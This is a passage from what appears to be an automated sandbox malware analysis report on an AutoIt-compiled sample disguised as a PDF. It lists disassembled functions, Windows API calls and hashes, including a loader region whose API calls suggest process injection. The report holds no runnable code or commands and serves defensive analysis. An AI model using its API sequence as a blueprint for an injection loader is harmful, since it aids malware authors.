                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$CreateShow
                                                                          • String ID: AutoIt v3$edit
                                                                          • API String ID: 1584632944-3779509399
                                                                          • Opcode ID: 070fb7670884fcf7f909935987cf392759704de4df585b88d7daa2be79ac23f4
                                                                          • Instruction ID: 7ea3b6dd881b4355be674c34c0ee8e554147336f83d2310a5cbe1ffa0ec606e4
                                                                          • Opcode Fuzzy Hash: 070fb7670884fcf7f909935987cf392759704de4df585b88d7daa2be79ac23f4
                                                                          • Instruction Fuzzy Hash: BAF0DAB16413907EEA315B677C4AF772F7DE7C7F50B04412AB904E31B0CAA91851DAB0
                                                                          Function 01C523B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 134fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1074 1c523b0-1c524b0 call 1c50000 call 1c522a0 CreateFileW 1081 1c524b7-1c524c7 1074->1081 1082 1c524b2 1074->1082 1085 1c524ce-1c524e8 VirtualAlloc 1081->1085 1086 1c524c9 1081->1086 1083 1c52567-1c5256c 1082->1083 1087 1c524ec-1c52503 ReadFile 1085->1087 1088 1c524ea 1085->1088 1086->1083 1089 1c52505 1087->1089 1090 1c52507-1c52541 call 1c522e0 call 1c512a0 1087->1090 1088->1083 1089->1083 1095 1c52543-1c52558 call 1c52330 1090->1095 1096 1c5255d-1c52565 ExitProcess 1090->1096 1095->1096 1096->1083
                                                                          APIs
                                                                            • Part of subcall function 01C522A0: Sleep.KERNELBASE(000001F4), ref: 01C522B1
                                                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01C524A6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFileSleep
                                                                          • String ID: QHJA9R028E2C
                                                                          • API String ID: 2694422964-1086926646
                                                                          • Opcode ID: d57726b4d6be3cfe792c6ed16bd0e7795b6e9238aa06d940f4bcbccd0ca31352
                                                                          • Instruction ID: 6d4172e6c0e806a12afd7dc31bc4d76357eb0dfe1346bfff1a693093f9b6bbd2
                                                                          • Opcode Fuzzy Hash: d57726b4d6be3cfe792c6ed16bd0e7795b6e9238aa06d940f4bcbccd0ca31352
                                                                          • Instruction Fuzzy Hash: B1516371D14209DBEF11DBE4C814BEEBBB8AF54300F004199E609BB2C0D7755B85CBA5
                                                                          Function 00AE410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1098 ae410d-ae4123 1099 ae4129-ae413e call ae7b76 1098->1099 1100 ae4200-ae4204 1098->1100 1103 ae4144-ae4164 call ae7d2c 1099->1103 1104 b1d5dd-b1d5ec LoadStringW 1099->1104 1106 b1d5f7-b1d60f call ae7c8e call ae7143 1103->1106 1108 ae416a-ae416e 1103->1108 1104->1106 1116 ae417e-ae41fb call b03020 call ae463e call b02ffc Shell_NotifyIconW call ae5a64 1106->1116 1120 b1d615-b1d633 call ae7e0b call ae7143 call ae7e0b 1106->1120 1110 ae4174-ae4179 call ae7c8e 1108->1110 1111 ae4205-ae420e call ae81a7 1108->1111 1110->1116 1111->1116 1116->1100 1120->1116
                                                                          APIs
                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B1D5EC
                                                                            • Part of subcall function 00AE7D2C: _memmove.LIBCMT ref: 00AE7D66
                                                                          • _memset.LIBCMT ref: 00AE418D
                                                                          • _wcscpy.LIBCMT ref: 00AE41E1
                                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AE41F1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                          • String ID: Line:
                                                                          • API String ID: 3942752672-1585850449
                                                                          • Opcode ID: 76d17735bac7e1430378d4dbc39c9f26707f8fef7b74483b116e0f901b88ec2d
                                                                          • Instruction ID: 31dc9c11c0470bcf4bb9e9f45b157daf92640aee04aaa00483feed44b331dbeb
                                                                          • Opcode Fuzzy Hash: 76d17735bac7e1430378d4dbc39c9f26707f8fef7b74483b116e0f901b88ec2d
                                                                          • Instruction Fuzzy Hash: 1B31E0B1008385AAD721EB61DD46FEF77ECAF59300F14461EF185930A1EF74AA48CB92
                                                                          Function 00B0564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1133 b0564d-b05666 1134 b05683 1133->1134 1135 b05668-b0566d 1133->1135 1137 b05685-b0568b 1134->1137 1135->1134 1136 b0566f-b05671 1135->1136 1138 b05673-b05678 call b08d68 1136->1138 1139 b0568c-b05691 1136->1139 1151 b0567e call b08ff6 1138->1151 1141 b05693-b0569d 1139->1141 1142 b0569f-b056a3 1139->1142 1141->1142 1143 b056c3-b056d2 1141->1143 1144 b056b3-b056b5 1142->1144 1145 b056a5-b056b0 call b03020 1142->1145 1149 b056d4-b056d7 1143->1149 1150 b056d9 1143->1150 1144->1138 1148 b056b7-b056c1 1144->1148 1145->1144 1148->1138 1148->1143 1153 b056de-b056e3 1149->1153 1150->1153 1151->1134 1155 b056e9-b056f0 1153->1155 1156 b057cc-b057cf 1153->1156 1157 b05731-b05733 1155->1157 1158 b056f2-b056fa 1155->1158 1156->1137 1159 b05735-b05737 1157->1159 1160 b0579d-b0579e call b10df7 1157->1160 1158->1157 1161 b056fc 1158->1161 1162 b05739-b05741 1159->1162 1163 b0575b-b05766 1159->1163 1170 b057a3-b057a7 1160->1170 1165 b05702-b05704 1161->1165 1166 b057fa 1161->1166 1168 b05751-b05755 1162->1168 1169 b05743-b0574f 1162->1169 1171 b05768 1163->1171 1172 b0576a-b0576d 1163->1172 1173 b05706-b05708 1165->1173 1174 b0570b-b05710 1165->1174 1167 b057fe-b05807 1166->1167 1167->1137 1177 b05757-b05759 1168->1177 1169->1177 1170->1167 1178 b057a9-b057ae 1170->1178 1171->1172 1175 b057d4-b057d8 1172->1175 1179 b0576f-b0577b call b04916 call b110ab 1172->1179 1173->1174 1174->1175 1176 b05716-b0572f call b10f18 1174->1176 1182 b057ea-b057f5 call b08d68 1175->1182 1183 b057da-b057e7 call b03020 1175->1183 1191 b05792-b0579b 1176->1191 1177->1172 1178->1175 1181 b057b0-b057c1 1178->1181 1194 b05780-b05785 1179->1194 1187 b057c4-b057c6 1181->1187 1182->1151 1183->1182 1187->1155 1187->1156 1191->1187 1195 b0578b-b0578e 1194->1195 1196 b0580c-b05810 1194->1196 1195->1166 1197 b05790 1195->1197 1196->1167 1197->1191
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                          • String ID:
                                                                          • API String ID: 1559183368-0
                                                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                          • Instruction ID: 73eee4d5567ce86c4afb21f56c771010cc6aac9564621d55a4b7618a692be49f
                                                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                                          • Instruction Fuzzy Hash: 06519070A00B05DFDB349FA988846AF7FE5EF40320F6487A9E82596AD0D7719E50AF50
                                                                          Function 00AE69CA Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE4F3D: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00BA62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AE4F6F
                                                                          • _free.LIBCMT ref: 00B1E68C
                                                                          • _free.LIBCMT ref: 00B1E6D3
                                                                            • Part of subcall function 00AE6BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AE6D0D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                                                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                          • API String ID: 2861923089-1757145024
                                                                          • Opcode ID: 7c48933dc24d8d69de1d2af3ea900df554ef6f9c01ae124d570873c85ee83abe
                                                                          • Instruction ID: 2c6eaff6341afb2c9f458208abba8f064a9fba5107d67199de9ca6fa7c155ca3
                                                                          • Opcode Fuzzy Hash: 7c48933dc24d8d69de1d2af3ea900df554ef6f9c01ae124d570873c85ee83abe
                                                                          • Instruction Fuzzy Hash: 7C918B71910259AFCF04EFA5C8919EDB7F5FF18304F9444A9F825AB2A1EB30E944CB60
                                                                          Function 00AE35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AE35A1,SwapMouseButtons,00000004,?), ref: 00AE35D4
                                                                          • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AE35A1,SwapMouseButtons,00000004,?,?,?,?,00AE2754), ref: 00AE35F5
                                                                          • RegCloseKey.KERNELBASE(00000000,?,?,00AE35A1,SwapMouseButtons,00000004,?,?,?,?,00AE2754), ref: 00AE3617
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpenQueryValue
                                                                          • String ID: Control Panel\Mouse
                                                                          • API String ID: 3677997916-824357125
                                                                          • Opcode ID: df49339bf0552b108dad3ca6d14160eb473777c58562198b236f4ff56d64b9d2
                                                                          • Instruction ID: 7f180973ee4e6fd5c389944c6f3b33d4798c8b6d3430d9cfa6c3ed94fcf9d5e5
                                                                          • Opcode Fuzzy Hash: df49339bf0552b108dad3ca6d14160eb473777c58562198b236f4ff56d64b9d2
                                                                          • Instruction Fuzzy Hash: FB114872510248BFDF20CFA9EC489BFB7B8EF05740F018469E805D7210D6719E409760
                                                                          Function 01C512A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 01C51A5B
                                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01C51AF1
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01C51B13
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1752233617.0000000001C50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01C50000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_1c50000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 2438371351-0
                                                                          • Opcode ID: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                          • Instruction ID: cdac501769921955a1b26a3750a344b3649b15ed5f161e0a6d0bb3c979b42a42
                                                                          • Opcode Fuzzy Hash: f7a3111ab7015fd8b62422fe8fc399687c9bf18e9b49b2a513bdf356eeec8a8c
                                                                          • Instruction Fuzzy Hash: D0622B30A14258DBEB64CFA4C845BDEB372EF58300F1491A9D60DEB390E7799E81CB59
                                                                          Function 00B497E5 Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00AE5045: _fseek.LIBCMT ref: 00AE505D
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AAE
                                                                            • Part of subcall function 00B499BE: _wcscmp.LIBCMT ref: 00B49AC1
                                                                          • _free.LIBCMT ref: 00B4992C
                                                                          • _free.LIBCMT ref: 00B49933
                                                                          • _free.LIBCMT ref: 00B4999E
                                                                            • Part of subcall function 00B02F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00B09C64), ref: 00B02FA9
                                                                            • Part of subcall function 00B02F95: GetLastError.KERNEL32(00000000,?,00B09C64), ref: 00B02FBB
                                                                          • _free.LIBCMT ref: 00B499A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                          • String ID:
                                                                          • API String ID: 1552873950-0
                                                                          • Opcode ID: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                                          • Instruction ID: b1a9a0573c6e6c92314845dc9f10e70aa8111011c662c37dcf4f2afb2713f64c
                                                                          • Opcode Fuzzy Hash: 922d4df5b64e1696f8af207ae7c752e1e6b30532c460fe4269bae0bb53f03174
                                                                          • Instruction Fuzzy Hash: ED515BB1D04258AFDF249F65DC85A9EBBB9EF48314F1004EEB609A7281DB715E80CF58
                                                                          Function 00B0493A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                          • String ID:
                                                                          • API String ID: 2782032738-0
                                                                          • Opcode ID: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                          • Instruction ID: 057c52fb1c7e432d11fee0286921f3eab756d6e834edeb4d478c8e1f16b2ab96
                                                                          • Opcode Fuzzy Hash: 14470a6213cb86a88b8286372661136e60ed3d9327b1e96cf2061ba74b92ecb7
                                                                          • Instruction Fuzzy Hash: B24195B17406059FDF288EA9C88096F7FE5EF84360B2485BDEA55C76D0D7709D418744
                                                                          Function 00AE73E5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00B1EE62
                                                                          • GetOpenFileNameW.COMDLG32(?), ref: 00B1EEAC
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                            • Part of subcall function 00B009D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B009F4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Name$Path$FileFullLongOpen_memset
                                                                          • String ID: X
                                                                          • API String ID: 3777226403-3081909835
                                                                          • Opcode ID: 27f8d465b698cd1058369670b8b653d0b0d5cc72aa5d8b0b4dddc64fd67e9a27
                                                                          • Instruction ID: 0900ca2248ba694d1bf0705a4ded92290b4462aae4c875232d9e7462328824bb
                                                                          • Opcode Fuzzy Hash: 27f8d465b698cd1058369670b8b653d0b0d5cc72aa5d8b0b4dddc64fd67e9a27
                                                                          • Instruction Fuzzy Hash: 3E21D571A142989BDF51DF98CC45BEEBBFC9F49700F00405AE408E7281DBB499898FA1
                                                                          Function 00B4901B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: 06343a615181abf98cabf92d070345fb6c3de55771e28ca5d7e38b4d8ea06b8d
                                                                          • Instruction ID: 602ecc4bb0bb5539b3e1016f4654084cd2ddd096f2785dafc2340cb694053b93
                                                                          • Opcode Fuzzy Hash: 06343a615181abf98cabf92d070345fb6c3de55771e28ca5d7e38b4d8ea06b8d
                                                                          • Instruction Fuzzy Hash: 7901F971804218AEDB28C6A8C856EEE7FFCDB01301F0041DAF592D22C1E575A7089BA0
                                                                          Function 00B49B6D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?), ref: 00B49B82
                                                                          • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00B49B99
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Temp$FileNamePath
                                                                          • String ID: aut
                                                                          • API String ID: 3285503233-3010740371
                                                                          • Opcode ID: 11547f1e147753d0ad63e37aaa59bdd8d08b3c9bcd783d9da385151ecd834b91
                                                                          • Instruction ID: fa4b090a0a23748c2ef20b4db966cc96a35ef53419150690f74dd2b7f6739b37
                                                                          • Opcode Fuzzy Hash: 11547f1e147753d0ad63e37aaa59bdd8d08b3c9bcd783d9da385151ecd834b91
                                                                          • Instruction Fuzzy Hash: E7D05E7A94030EABDB109B90EC0EFAA776CE704704F0042B1FE54921E1DEF455988FD1
                                                                          Function 00B5CDF1 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dffaa441c12ea4401850c627dca6e9d0fd98d2890a83c8c313816966db5ff3db
                                                                          • Instruction ID: f0d7f7a0259d12360a79048df1a66280a05efc087abb178d55a6c8479126ec16
                                                                          • Opcode Fuzzy Hash: dffaa441c12ea4401850c627dca6e9d0fd98d2890a83c8c313816966db5ff3db
                                                                          • Instruction Fuzzy Hash: 51F16C706083419FC724DF28C584A6ABBE5FF88314F1489ADF8999B351D771E94ACF82
                                                                          Function 00AEF8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B003D3
                                                                            • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00B003DB
                                                                            • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B003E6
                                                                            • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B003F1
                                                                            • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00B003F9
                                                                            • Part of subcall function 00B003A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00B00401
                                                                            • Part of subcall function 00AF6259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AEFA90), ref: 00AF62B4
                                                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AEFB2D
                                                                          • OleInitialize.OLE32(00000000), ref: 00AEFBAA
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00B249F2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                          • String ID:
                                                                          • API String ID: 1986988660-0
                                                                          • Opcode ID: 4af8db771598cdc56d0352e7f117e8f46a10feab5dee61fcf061b363be371922
                                                                          • Instruction ID: 2622542b2318b1ca1ec113c483d9028663aa88263f06bca4703d25b300262662
                                                                          • Opcode Fuzzy Hash: 4af8db771598cdc56d0352e7f117e8f46a10feab5dee61fcf061b363be371922
                                                                          • Instruction Fuzzy Hash: F881B9F19182808ECB84DF7AE9566297BE4FB5E30871885BAD429C73A2EF754805CF14
                                                                          Function 00AE43DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 00AE4401
                                                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AE44A6
                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AE44C3
                                                                          Memory Dump Source
